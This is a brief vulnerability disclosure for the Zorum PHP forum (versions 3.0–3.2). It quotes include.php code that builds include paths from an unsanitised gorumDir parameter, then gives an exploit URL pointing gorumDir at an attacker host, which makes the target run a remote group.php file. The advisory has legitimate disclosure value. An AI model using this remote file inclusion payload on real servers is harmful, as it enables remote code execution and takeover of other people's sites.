Version : 3.0;3.1;3.2 Website : http://zorum.phpoutsourcing.com/ Problem : Include file File: --------------------------------- include.php --------------------------------- PHP Code: --------------------------------- [...] include("$gorumDir/generformlib_multipleselection.php"); include("$gorumDir/generformlib_groupselection.php"); include("$gorumDir/generformlib_filebutton.php"); include("$gorumDir/group.php"); [...] --------------------------------- Exploit : --------------------------------- http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/ --> include http://[attacker]/group.php on remote server --------------------------------- -- magas@mail.lt
